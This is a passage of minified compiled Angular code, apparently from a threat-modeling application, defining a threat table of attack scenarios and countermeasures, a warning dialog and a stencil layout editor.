Om&&(this.AttackScenarios=this.threatEngine.GenerateStackThreats(this._selectedNode.data))),this.threatCountChanged.emit(this.dataSourceActive.data.length),this.countermeasureCounts={},this.isCalculatingThreats=!1},10)}OnMappingDblClick(e,i){i&&i.target&&"countermeasures"==this.displayedColumns[i.target.cellIndex]&&this.dataService.Project.GetCountermeasures().filter(n=>n.AttackScenarios.includes(e)).length>0?this.OnViewCountermeasures(e):this.dialog.OpenAttackScenarioDialog(e,!1,[...this.dataSourceActive.sortData(this.dataSourceActive.filteredData,this.sort),...this.dataSourceNA.sortData(this.dataSourceNA.filteredData,this.sort)])}ApplyFilter(e){const i=e.target.value;this.dataSourceActive.filter=i.trim().toLowerCase(),this.dataSourceNA.filter=i.trim().toLowerCase()}IsThreatSelected(e){return this.selectedThreat==e}IsThreatRemoved(e){return e.MappingState==zn.Removed}IsThreatNotApplying(e){return[_o.NotApplicable,_o.Duplicate].includes(e.ThreatState)}SelectThreat(e){this.selectedThreat=e,e.Target&&this.selectedObjectChanged.emit(e.Target)}IsElementSelected(e){return e&&this.selectedObject&&(e.Target==this.selectedObject||e.Targets.includes(this.selectedObject))}GetFilteredCountermeasures(e){return this.dataService.Project.GetCountermeasuresApplicable().filter(i=>i.Name.toLowerCase().includes(this.searchCMString.toLowerCase())&&!i.AttackScenarios.includes(e))}GetCountermeasureGroups(e){if(null==this.countermeasureGroups){this.countermeasureGroups=[];const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>!e.GetCountermeasures().includes(n)).reduce((n,r)=>Object.assign(Object.assign({},n),{[r.ViewID]:[...n[r.ViewID]||[],r]}),{});Object.keys(i).forEach(n=>{var r;this.countermeasureGroups.push({name:null===(r=this.dataService.Project.GetView(n))||void 0===r?void 0:r.Name,countermeasures:i[n]})}),this.countermeasureGroups.forEach(n=>n.countermeasures.sort((r,c)=>r.MitigationState>c.MitigationState?-1:r.MitigationState==c.MitigationState?0:1))}return this.countermeasureGroups}AddCountermeasure(e){const i=this.dataService.Project.CreateCountermeasure(this.selectedNode.data.ID,!1);i.SetMapping(null,e.Targets,[e]);let n=[];this.selectedNode.data instanceof as?n=this.selectedNode.data.Elements.GetChildrenFlat():this.selectedNode.data instanceof Om&&(n=this.selectedNode.data.GetChildrenFlat()),this.dialog.OpenCountermeasureDialog(i,!0,n).subscribe(r=>{r||this.dataService.Project.DeleteCountermeasure(i),this.countermeasureCounts[e.ID]=null})}AddExistingCountermeasure(e,i){i.AddAttackScenario(e),this.countermeasureCounts[e.ID]=null,e.Target&&i.AddTarget(e.Target)}OnViewCountermeasures(e){this.dataService.Project.GetCountermeasures().filter(i=>i.AttackScenarios.includes(e)).forEach(i=>{this.dialog.OpenCountermeasureDialog(i,!1,null)})}OnDeleteMapping(e){this.dataService.Project.DeleteAttackScenario(e),this.RefreshThreats()}ResetNumbers(){const e=this.dataService.Project.GetAttackScenarios().sort((i,n)=>Number(i.Number)-Number(n.Number));for(let i=0;i<e.length;i++)e[i].Number=(i+1).toString()}OpenContextMenu(e,i){e.preventDefault(),this.menuTopLeftPosition.x=e.clientX+"px",this.menuTopLeftPosition.y=e.clientY+"px",this.matMenuTrigger.menuData={item:i},this.matMenuTrigger.openMenu()}GetStateIcon(e){return e.MappingState==zn.New?"add":e.MappingState==zn.Removed?"remove":""}GetCreationTypeIcon(e){return e.IsGenerated?"settings_suggest":"handyman"}GetCreationTypeIconTooltip(e){return e.IsGenerated?"general.Generated":"general.Manual"}GetThreatCategories(e){return e.ThreatCategories.map(i=>i.Name).join(", ")}GetTargets(e){return e.Targets.map(i=>i.GetProperty("Name")).join(", ")}GetCountermeasures(e){if(null==this.countermeasureCounts[e.ID]){const i=this.dataService.Project.GetCountermeasuresApplicable().filter(n=>n.AttackScenarios.includes(e)).length;this.countermeasureCounts[e.ID]=0==i?this.translate.instant("pages.modeling.threattable.noCountermeasure"):i.toString()+" "+this.translate.instant("pages.modeling.threattable.countermeasures")}return this.countermeasureCounts[e.ID]}GetApplicableCount(){return Gi.Format(this.translate.instant("pages.modeling.threattable.applicable"),this.dataSourceActive.data.length.toString(),this.AttackScenarios.length.toString())}GetThreatStates(){return ku.GetThreatStates()}GetThreatStateName(e){return ku.ToString(e)}OnSearchCMBoxClick(){var e,i,n;null===(n=null===(i=null===(e=this.searchCMBox)||void 0===e?void 0:e._elementRef)||void 0===i?void 0:i.nativeElement)||void 0===n||n.focus()}}return t.\u0275fac=function(e){return new(e||t)(Ee(Oa),Ee(Yi),Ee(RT),Ee(Wn),Ee(Sn))},t.\u0275cmp=Wt({type:t,selectors:[["app-threat-table"]],viewQuery:function(e,i){if(1&e&&(Mi(po,5),Mi(il,5),Mi(emt,5),Mi(xc,5,mi)),2&e){let n;Vt(n=Bt())&&(i.matMenuTrigger=n.first),Vt(n=Bt())&&(i.sort=n.first),Vt(n=Bt())&&(i.searchCMBox=n.first),Vt(n=Bt())&&(i.rows=n)}},hostBindings:function(e,i){1&e&&he("keydown",function(r){return i.onKeyDown(r)},0,Qc)},inputs:{isActive:"isActive",selectedNode:"selectedNode",selectedObject:"selectedObject",filteredObject:"filteredObject"},outputs:{selectedObjectChanged:"selectedObjectChanged",threatCountChanged:"threatCountChanged"},decls:221,vars:38,consts:[[2,"height","100%","display","grid","align-content","start"],[1,"tools"],["mat-button","","matTooltipShowDelay","1000",1,"toolBtn",3,"matTooltip","click"],["matInput","",1,"filterInput",3,"placeholder","keyup"],["style","display: inline; vertical-align: super; margin-left: 5px;","mode","indeterminate",3,"diameter",4,"ngIf"],["style","float: right; padding-top: 5px;",4,"ngIf"],[2,"overflow","auto"],["mat-table","","matSort","","matSortActive","state","matSortDirection","asc","matSortDisableClear","",2,"width","100%",3,"dataSource"],["matColumnDef","state"],["mat-header-cell","","mat-sort-header","","style","width: 34px;",4,"matHeaderCellDef"],["mat-cell","",4,"matCellDef"],["matColumnDef","number"],["mat-header-cell","","mat-sort-header","",4,"matHeaderCellDef"],["matColumnDef","name"],["matColumnDef","type"],["matColumnDef","vector"],["matColumnDef","categories"],["matColumnDef","target"],["mat-cell","",3,"selected-cell",4,"matCellDef"],["matColumnDef","rule"],["matColumnDef","elements"],["matColumnDef","countermeasures"],["mat-header-cell","",4,"matHeaderCellDef"],["matColumnDef","status"],["matColumnDef","more"],["mat-header-row","","style","height: 30px;",4,"matHeaderRowDef","matHeaderRowDefSticky"],["mat-row","",3,"id","selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],["class","mat-row",4,"matNoDataRow"],["mat-row","",3,"selected-item","removed-item","click","dblclick","contextmenu",4,"matRowDef","matRowDefColumns"],[2,"visibility","hidden","position","fixed",3,"matMenuTriggerFor"],["rightMenu","matMenu"],["matMenuContent",""],["mode","indeterminate",2,"display","inline","vertical-align","super","margin-left","5px",3,"diameter"],[2,"float","right","padding-top","5px"],["mat-header-cell","","mat-sort-header","",2,"width","34px"],["mat-cell",""],["mat-header-cell","","mat-sort-header",""],["matBadgeColor","warn","matBadgeSize","small","matBadgePosition","below",3,"matBadge","matBadgeHidden","matTooltip"],[4,"ngIf"],["mat-header-cell",""],[2,"width","140px",3,"ngModel","ngModelChange"],[3,"value",4,"ngFor","ngForOf"],[3,"value"],["matTooltipShowDelay","1000",3,"matTooltip","click"],["mat-header-row","",2,"height","30px"],["mat-row","",3,"id","click","dblclick","contextmenu"],[1,"mat-row"],["colspan","9",1,"mat-cell",3,"contextmenu"],["mat-row","",3,"click","dblclick","contextmenu"],["style","margin-left: 20px; margin-right: 20px;",4,"ngIf"],["mat-menu-item","",3,"disabled","click"],["mat-menu-item","",3,"disabled","matMenuTriggerFor"],["addMenu","matMenu"],["mat-menu-item","",3,"click"],["mat-menu-item","",3,"matMenuTriggerFor"],["existingMenu","matMenu"],["mat-menu-item","",3,"ngModel","matMenuTriggerFor","placeholder","ngModelChange","click"],["searchCMBox",""],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData",4,"ngFor","ngForOf"],["countermeasureList","matMenu"],["filteredCountermeasureList","matMenu"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click",4,"ngFor","ngForOf"],[2,"margin-left","20px","margin-right","20px"],["mat-menu-item","",3,"matMenuTriggerFor","matMenuTriggerData"],["mat-menu-item","","matTooltipShowDelay","1000",3,"matTooltip","click"]],template:function(e,i){if(1&e&&(m(0,"div",0),s(1,"\n  "),m(2,"div",1),s(3,"\n    "),m(4,"button",2),he("click",function(){return i.RefreshThreats()}),oe(5,"translate"),s(6,"\n      "),m(7,"mat-icon"),s(8,"refresh"),u(),s(9,"\n    "),u(),s(10,"\n    "),m(11,"button",2),he("click",function(){return i.autoRefreshThreats=!i.autoRefreshThreats}),oe(12,"translate"),s(13,"\n      "),m(14,"mat-icon"),s(15,"autorenew"),u(),s(16,"\n    "),u(),s(17,"\n    "),m(18,"input",3),he("keyup",function(r){return i.ApplyFilter(r)}),oe(19,"translate"),u(),s(20,"\n    "),ne(21,tmt,1,1,"mat-progress-spinner",4),s(22,"\n    "),ne(23,imt,2,1,"span",5),s(24,"\n  "),u(),s(25,"\n  "),m(26,"div",6),s(27,"\n    "),s(28,"\n    "),m(29,"table",7),s(30,"\n      "),bt(31,8),s(32,"\n        "),ne(33,amt,2,0,"th",9),s(34,"\n        "),ne(35,nmt,5,1,"td",10),s(36,"\n      "),Mt(),s(37,"\n      "),bt(38,11),s(39,"\n        "),ne(40,omt,3,3,"th",12),s(41,"\n        "),ne(42,rmt,2,1,"td",10),s(43,"\n      "),Mt(),s(44,"\n      "),bt(45,13),s(46,"\n        "),ne(47,smt,3,3,"th",12),s(48,"\n        "),ne(49,cmt,2,1,"td",10),s(50,"\n      "),Mt(),s(51,"\n      "),bt(52,14),s(53,"\n        "),ne(54,lmt,2,0,"th",12),s(55,"\n        "),ne(56,dmt,6,6,"td",10),s(57,"\n      "),Mt(),s(58,"\n      "),bt(59,15),s(60,"\n        "),ne(61,mmt,3,3,"th",12),s(62,"\n        "),ne(63,umt,2,1,"td",10),s(64,"\n      "),Mt(),s(65,"\n      "),bt(66,16),s(67,"\n        "),ne(68,hmt,3,3,"th",12),s(69,"\n        "),ne(70,fmt,2,1,"td",10),s(71,"\n      "),Mt(),s(72,"\n      "),bt(73,17),s(74,"\n        "),ne(75,pmt,3,3,"th",12),s(76,"\n        "),ne(77,_mt,2,3,"td",18),s(78,"\n      "),Mt(),s(79,"\n      "),bt(80,19),s(81,"\n        "),ne(82,gmt,3,3,"th",12),s(83,"\n        "),ne(84,ymt,3,1,"td",10),s(85,"\n      "),Mt(),s(86,"\n      "),bt(87,20),s(88,"\n        "),ne(89,bmt,3,3,"th",12),s(90,"\n        "),ne(91,Mmt,2,3,"td",18),s(92,"\n      "),Mt(),s(93,"\n      "),bt(94,21),s(95,"\n        "),ne(96,vmt,3,3,"th",22),s(97,"\n        "),ne(98,Amt,2,1,"td",10),s(99,"\n      "),Mt(),s(100,"\n      "),bt(101,23),s(102,"\n        "),ne(103,Tmt,3,3,"th",12),s(104,"\n        "),ne(105,Dmt,7,2,"td",10),s(106,"\n      "),Mt(),s(107,"\n      "),bt(108,24),s(109,"\n        "),ne(110,xmt,2,0,"th",22),s(111,"\n        "),ne(112,wmt,6,3,"td",10),s(113,"\n      "),Mt(),s(114,"\n  \n      "),ne(115,Imt,1,0,"tr",25),s(116,"\n      "),ne(117,Rmt,2,5,"tr",26),s(118,"\n      "),ne(119,Smt,6,3,"tr",27),s(120,"\n    "),u(),s(121,"\n\n    "),s(122,"\n    "),m(123,"table",7),s(124,"\n      "),bt(125,8),s(126,"\n        "),ne(127,kmt,2,0,"th",9),s(128,"\n        "),ne(129,Pmt,5,1,"td",10),s(130,"\n      "),Mt(),s(131,"\n      "),bt(132,11),s(133,"\n        "),ne(134,Omt,3,3,"th",12),s(135,"\n        "),ne(136,Nmt,2,1,"td",10),s(137,"\n      "),Mt(),s(138,"\n      "),bt(139,13),s(140,"\n        "),ne(141,Lmt,3,3,"th",12),s(142,"\n        "),ne(143,zmt,2,1,"td",10),s(144,"\n      "),Mt(),s(145,"\n      "),bt(146,14),s(147,"\n        "),ne(148,Wmt,2,0,"th",12),s(149,"\n        "),ne(150,Fmt,6,6,"td",10),s(151,"\n      "),Mt(),s(152,"\n      "),bt(153,15),s(154,"\n        "),ne(155,Vmt,3,3,"th",12),s(156,"\n        "),ne(157,Bmt,2,1,"td",10),s(158,"\n      "),Mt(),s(159,"\n      "),bt(160,16),s(161,"\n        "),ne(162,Hmt,3,3,"th",12),s(163,"\n        "),ne(164,Umt,2,1,"td",10),s(165,"\n      "),Mt(),s(166,"\n      "),bt(167,17),s(168,"\n        "),ne(169,qmt,3,3,"th",12),s(170,"\n        "),ne(171,Gmt,2,3,"td",18),s(172,"\n      "),Mt(),s(173,"\n      "),bt(174,19),s(175,"\n        "),ne(176,jmt,3,3,"th",12),s(177,"\n        "),ne(178,$mt,3,1,"td",10),s(179,"\n      "),Mt(),s(180,"\n      "),bt(181,20),s(182,"\n        "),ne(183,Kmt,3,3,"th",12),s(184,"\n        "),ne(185,Xmt,2,3,"td",18),s(186,"\n      "),Mt(),s(187,"\n      "),bt(188,21),s(189,"\n        "),ne(190,Ymt,3,3,"th",22),s(191,"\n        "),ne(192,Jmt,2,1,"td",10),s(193,"\n      "),Mt(),s(194,"\n      "),bt(195,23),s(196,"\n        "),ne(197,Zmt,3,3,"th",12),s(198,"\n        "),ne(199,tut,7,2,"td",10),s(200,"\n      "),Mt(),s(201,"\n      "),bt(202,24),s(203,"\n        "),ne(204,iut,2,0,"th",22),s(205,"\n        "),ne(206,aut,6,3,"td",10),s(207,"\n      "),Mt(),s(208,"\n  \n      "),ne(209,nut,2,4,"tr",28),s(210,"\n    "),u(),s(211,"\n  "),u(),s(212,"\n  "),it(213,"div",29),s(214," \n  "),m(215,"mat-menu",null,30),s(217," \n    "),ne(218,uut,89,36,"ng-template",31),s(219," \n  "),u(),s(220," \n"),u()),2&e){const n=Ti(216);C(4),at("matTooltip",re(5,32,"general.Refresh")),C(7),Ct("toolBtn-Selected",i.autoRefreshThreats),at("matTooltip",re(12,34,"pages.modeling.threattable.autoRefresh")),C(7),ri("color",i.theme.IsDarkMode?"white":"black"),Ct("bg-color-light2",!i.theme.IsDarkMode)("bg-color-dark2",i.theme.IsDarkMode),at("placeholder",re(19,36,"pages.modeling.filter")),C(3),V("ngIf",i.refreshingThreats),C(2),V("ngIf",i.AttackScenarios.length>0),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceActive),C(86),V("matHeaderRowDef",i.displayedColumns)("matHeaderRowDefSticky",!0),C(2),V("matRowDefColumns",i.displayedColumns),C(6),Ct("bg-color-light3",!i.theme.IsDarkMode)("bg-color-dark3",i.theme.IsDarkMode),V("dataSource",i.dataSourceNA),C(86),V("matRowDefColumns",i.displayedColumns),C(4),ri("left",i.menuTopLeftPosition.x)("top",i.menuTopLeftPosition.y),V("matMenuTriggerFor",n)}},dependencies:[Zi,Ri,pm,_m,an,Td,Ta,Ea,oa,Hh,da,Xa,wl,Xo,qo,po,Zc,Pa,Au,Tu,jh,xm,Dm,Du,Eu,wm,Qh,xc,yp,il,Mp,Xi],styles:[".primary-color[_ngcontent-%COMP%], .selected-cell[_ngcontent-%COMP%], .selected-item[_ngcontent-%COMP%]   td[_ngcontent-%COMP%]{color:#2196f3!important}.primary-background[_ngcontent-%COMP%]{background-color:#2196f3!important}.bg-color-light1[_ngcontent-%COMP%], .splitter-light2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#e7e5e5!important}.bg-color-light2[_ngcontent-%COMP%]{background-color:#f5f5f5!important}.bg-color-light3[_ngcontent-%COMP%]{background-color:#fff!important}.bg-color-dark1[_ngcontent-%COMP%], .splitter-dark2[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]     .as-split-gutter{background-color:#333!important}.bg-color-dark2[_ngcontent-%COMP%]{background-color:#252525!important}.bg-color-dark3[_ngcontent-%COMP%]{background-color:#1e1e1e!important}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter{position:relative}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon{background-image:none!important;transition:opacity .3s;opacity:0;position:absolute}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter-icon:hover{opacity:1;background-color:#2196f3}.splitter[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light2[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-dark1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon, .splitter-light1[_ngcontent-%COMP%]   as-split[_ngcontent-%COMP%]     .as-split-gutter.as-dragged .as-split-gutter-icon{background-color:#2196f3;opacity:1}th[_ngcontent-%COMP%], td[_ngcontent-%COMP%]{font-size:small}tr[_ngcontent-%COMP%]{height:30px!important}th.mat-header-cell[_ngcontent-%COMP%]:first-of-type, td.mat-cell[_ngcontent-%COMP%]:first-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:first-of-type{padding-left:5px!important}th.mat-header-cell[_ngcontent-%COMP%]:last-of-type, td.mat-cell[_ngcontent-%COMP%]:last-of-type, td.mat-footer-cell[_ngcontent-%COMP%]:last-of-type{padding-right:5px!important}.removed-item[_ngcontent-%COMP%]{opacity:.3}.tools[_ngcontent-%COMP%]{display:block;float:left;height:27px;width:calc(100% - 20px);font-size:12px}.toolBtn[_ngcontent-%COMP%]{width:30px;min-width:30px;padding:0;line-height:25px;margin-left:5px}.toolBtn-Selected[_ngcontent-%COMP%]{background-color:#ffffff26}.filterInput[_ngcontent-%COMP%]{margin-left:5px;width:200px;height:25px}.disable[_ngcontent-%COMP%]{pointer-events:none}"]}),t})(),fut=(()=>{class t{constructor(e){this.data=e}ngOnInit(){}}return t.\u0275fac=function(e){return new(e||t)(Ee(gp))},t.\u0275cmp=Wt({type:t,selectors:[["app-warning-dialog"]],decls:27,vars:19,consts:[["mat-dialog-title",""],["color","primary",3,"ngModel","ngModelChange"],["align","end"],["mat-button","",3,"disabled","mat-dialog-close"]],template:function(e,i){1&e&&(m(0,"h2",0),s(1),oe(2,"translate"),u(),s(3,"\n"),m(4,"mat-dialog-content"),s(5,"\n  "),m(6,"p"),s(7),oe(8,"translate"),u(),s(9,"\n  "),m(10,"p")(11,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.consent=r}),s(12),oe(13,"translate"),u()(),s(14,"\n  "),m(15,"p")(16,"mat-checkbox",1),he("ngModelChange",function(r){return i.data.remember=r}),s(17),oe(18,"translate"),u()(),s(19,"\n"),u(),s(20,"\n"),m(21,"mat-dialog-actions",2),s(22,"\n  "),m(23,"button",3),s(24),oe(25,"translate"),u(),s(26,"\n"),u()),2&e&&(C(1),ke(re(2,9,"general.Warning")),C(6),ke(re(8,11,"dialog.warning.changeConfig")),C(4),V("ngModel",i.data.consent),C(1),ke(re(13,13,"dialog.warning.consent")),C(4),V("ngModel",i.data.remember),C(1),ke(re(18,15,"dialog.warning.rememberForToday")),C(6),V("disabled",!i.data.consent)("mat-dialog-close",!0),C(1),ke(re(25,17,"general.OK")))},dependencies:[Ta,Ea,br,da,vm,Am,Tm,Em,Xi]}),t})();function put(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit,i=B(2);V("value",e),C(1),ke(i.GetElementTypeName(e))}}function _ut(t,a){if(1&t&&(m(0,"mat-option",8),s(1),u()),2&t){const e=a.$implicit;V("value",e),C(1),ke(e.GetProperty("Name"))}}function gut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n      "),m(2,"mat-label"),s(3,"Width"),u(),s(4,"\n      "),it(5,"input",12),s(6,"\n    "),u()),2&t){const e=B().index,i=B(2);C(5),V("ngModel",i.selectedTypeTemplate.Layout[e].width)}}function Cut(t,a){if(1&t&&(m(0,"mat-form-field",11),s(1,"\n      "),m(2,"mat-label"),s(3,"Height"),u(),s(4,"\n      "),it(5,"input",12),s(6,"\n    "),u()),2&t){const e=B().index,i=B(2);C(5),V("ngModel",i.selectedTypeTemplate.Layout[e].height)}}function yut(t,a){if(1&t){const e=Ye();m(0,"div"),s(1,"\n    "),m(2,"mat-form-field",9),s(3,"\n      "),m(4,"mat-label"),s(5),u(),s(6,"\n      "),m(7,"input",10),he("ngModelChange",function(n){const c=be(e).index;return Me(B(2).selectedTypeTemplate.Layout[c].name=n)}),u(),s(8,"\n    "),u(),s(9,"\n    "),m(10,"mat-form-field",11),s(11,"\n      "),m(12,"mat-label"),s(13,"X"),u(),s(14,"\n      "),it(15,"input",12),s(16,"\n    "),u(),s(17,"\n    "),m(18,"mat-form-field",11),s(19,"\n      "),m(20,"mat-label"),s(21,"Y"),u(),s(22,"\n      "),it(23,"input",12),s(24,"\n    "),u(),s(25,"\n    "),ne(26,gut,7,1,"mat-form-field",13),s(27,"\n    "),ne(28,Cut,7,1,"mat-form-field",13),s(29,"\n  "),u()}if(2&t){const e=a.$implicit,i=a.index,n=B(2);C(5),ke(e.GetProperty("Name")),C(2),V("spellcheck",n.dataService.HasSpellCheck)("ngModel",n.selectedTypeTemplate.Layout[i].name),C(8),V("ngModel",n.selectedTypeTemplate.Layout[i].x),C(8),V("ngModel",n.selectedTypeTemplate.Layout[i].y),C(3),V("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize),C(2),V("ngIf",n.selectedTypeTemplate.Layout[i].canEditSize)}}function but(t,a){if(1&t){const e=Ye();bt(0),s(1,"\n  "),m(2,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInHWDiagram=n)}),s(3),oe(4,"translate"),u(),s(5,"\n  "),it(6,"br"),s(7,"\n  "),m(8,"mat-checkbox",1),he("ngModelChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInUCDiagram=n)}),s(9),oe(10,"translate"),u(),s(11,"\n  "),it(12,"br"),s(13,"\n  "),m(14,"mat-form-field",2),s(15,"\n    "),m(16,"mat-label"),s(17),oe(18,"translate"),u(),s(19,"\n    "),m(20,"mat-select",3),he("valueChange",function(n){return be(e),Me(B().selectedTypeTemplate.ListInElementTypeIDs=n)}),s(21,"\n      "),ne(22,put,2,2,"mat-option",4),s(23,"\n    "),u(),s(24,"\n  "),u(),s(25,"\n  "),m(26,"mat-form-field",5),s(27,"\n    "),m(28,"mat-label"),s(29),oe(30,"translate"),u(),s(31,"\n    "),m(32,"mat-select",3),he("valueChange",function(n){return be(e),Me(B().selectedTypeTemplate.StencilTypes=n)}),s(33,"\n      "),ne(34,_ut,2,2,"mat-option",4),s(35,"\n    "),u(),s(36,"\n  "),u(),s(37),oe(38,"translate"),m(39,"button",6),he("click",function(){return be(e),Me(B().AutoCalcLayout())}),oe(40,"translate"),m(41,"mat-icon"),s(42,"auto_fix_high"),u()(),s(43,"\n  "),it(44,"br"),s(45,"\n  "),ne(46,yut,30,7,"div",7),s(47,"\n"),Mt()}if(2&t){const e=B();C(2),V("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInHWDiagram),C(1),ke(re(4,15,"properties.ListInHWDiagram")),C(5),V("disabled",!e.selectedTypeTemplate.CanEditInWhichDiagram)("ngModel",e.selectedTypeTemplate.ListInUCDiagram),C(1),ke(re(10,17,"properties.ListInUCDiagram")),C(8),ke(re(18,19,"properties.ListInElementTypeIDs")),C(3),V("value",e.selectedTypeTemplate.ListInElementTypeIDs),C(2),V("ngForOf",e.GetElementTypes()),C(7),ke(re(30,21,"properties.StencilTypes")),C(3),V("value",e.selectedTypeTemplate.StencilTypes),C(2),V("ngForOf",e.GetStencilTypes()),C(3),ct("\n  ",re(38,23,"properties.Layout")," "),C(2),at("matTooltip",re(40,25,"pages.config.stencils.calcLayout")),C(7),V("ngForOf",e.selectedTypeTemplate.StencilTypes)}}let Mut=(()=>{class t{constructor(e){this.dataService=e}ngOnInit(){}GetElementTypes(){let e=[];return this.selectedTypeTemplate.ListInHWDiagram&&e.push(Et.PhyProcessing,Et.PhyDataStore,Et.PhyExternalEntity,Et.PhyTrustArea,Et.PhysicalLink,Et.Interface),this.selectedTypeTemplate.ListInUCDiagram&&e.push(Et.LogProcessing,Et.LogDataStore,Et.LogExternalEntity,Et.PhyExternalEntity,Et.LogTrustArea,Et.PhyTrustArea,Et.PhysicalLink),e}GetElementTypeName(e){return Sc.ToString(e)}GetStencilTypes(){let e=this.dataService.Config.GetStencilTypes();return e.sort((i,n)=>n.IsDefault?1:i.ElementTypeID-n.ElementTypeID),e}AutoCalcLayout(){var e,Fe;if(this.selectedTypeTemplate&&(null===(e=this.selectedTypeTemplate.StencilTypes)||void 0===e?void 0:e.length)>0){let i=this.selectedTypeTemplate.StencilTypes,n=this.selectedTypeTemplate.Layout,r=i.filter(Fe=>Fe.ElementTypeID!=Et.PhyTrustArea&&Fe.ElementTypeID!=Et.LogTrustArea),d=(Fe,Ne)=>Math.ceil(Fe/Ne);const T=20,k=40,q=20,Y=140,te=75;let pe=(Fe=r.length)<=4?2:Fe<=9?3:4,Re=d(r.length,pe);for(let Fe=0,Ne=0,et=0;Fe<i.length;Fe++)i[Fe].ElementTypeID!=Et.PhyTrustArea&&i[Fe].ElementTypeID!=Et.LogTrustArea?(n[Fe].x=T+et*(Y+q),n[Fe].y=k+Ne*(te+q),et++,et==pe&&(et=0,Ne++)):(n[Fe].x=n[Fe].y=0,n[Fe].width=2*T+pe*Y+(pe-1)*q,n[Fe].height=2*k+Re*te+(Re-1)*q)}}}return t.\u0275fac=function(e){return new(e||t)(Ee(Yi))},t.\u0275cmp=Wt({type:t,selectors:[["app-stencil-type-template"]],inputs:{selectedTypeTemplate:"selectedTypeTemplate"},decls:1,vars:1,consts:[[4,"ngIf"],["color","primary",3,"disabled","ngModel","ngModelChange"],["appearance","fill",2,"margin-top","15px","width","100%"],["multiple","",3,"value","valueChange"],[3,"value",4,"ngFor","ngForOf"],["appearance","fill",2,"width","100%"],["mat-icon-button","","matTooltipShowDelay","1000",2,"margin-left","15px",3,"matTooltip","click"],[4,"ngFor","ngForOf"],[3,"value"],["appearance","fill",1,"property-form-field"],["matInput","","type","text","matTooltip","selectedTypeTemplate.Layout[i]['name']","matTooltipShowDelay","1000",3,"spellcheck","ngModel","ngModelChange"],["appearance","fill",1,"number-form-field",2,"margin-left","10px"],["matInput","","type","number",3,"ngModel"],["class","number-form-field","appearance","fill","style","margin-left: 10px;",4,"ngIf"]],template:function(e,i){1&e&&ne(0,but,48,27,"ng-container",0),2&e&&V("ngIf",i.selectedTypeTemplate)},dependencies:[Zi,Ri,an,Ac,Ta,Ea,oa,br,da,nn,un,Nr,yr,Xa,Pa,Xi],styles:[".number-form-field[_ngcontent-%COMP%]{width:75px}"]}),t})();const vut=["ctxMenu"];function Aut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedType.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedType.Description)}}function Tut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return be(e),Me(B(2).selectedTypeTemplate.Description=n)}),u(),s(7,"\n  "),u()}if(2&t){const e=B(2);C(3),ke(re(4,3,"properties.Description")),C(3),V("spellcheck",e.dataService.HasSpellCheck)("ngModel",e.selectedTypeTemplate.Description)}}function Eut(t,a){if(1&t){const e=Ye();m(0,"mat-form-field",10),s(1,"\n    "),m(2,"mat-label"),s(3),oe(4,"translate"),u(),s(5,"\n    "),m(6,"textarea",11),he("ngModelChange",function(n){return 